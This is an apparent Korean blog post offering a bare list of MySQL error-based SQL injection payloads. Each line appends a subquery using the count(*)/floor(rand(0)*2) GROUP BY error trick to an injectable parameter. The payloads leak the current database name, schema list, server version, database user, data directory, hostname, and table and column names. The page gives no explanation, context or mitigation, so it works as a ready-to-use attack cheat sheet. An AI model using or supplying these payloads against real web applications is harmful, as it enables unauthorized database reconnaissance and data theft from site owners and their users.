본문 바로가기
mysql

mysql injection 예 , SQL 인젝션 예

by 씨엔아이소프트 2022. 6. 24.
반응형

SQL 인젝션 예

current db_name

+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



number of dps

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables GROUP BY x)a)



dbs 1 by 1

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



version

+and(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



db user

+and(select 1 FROM(select count(*),concat((select (select concat(user())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



directory

+and(select 1 FROM(select count(*),concat((select (select concat(@@datadir)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



hostnam

+and(select 1 FROM(select count(*),concat((select (select concat(@@hostname)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



number of tables

+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



table name

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> LIMIT 1,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)



number of columns in table

+and(select 1 FROM(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND table_name=<HEX_VLAUE_OF_TABLE_NAME>)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

 

 

반응형

댓글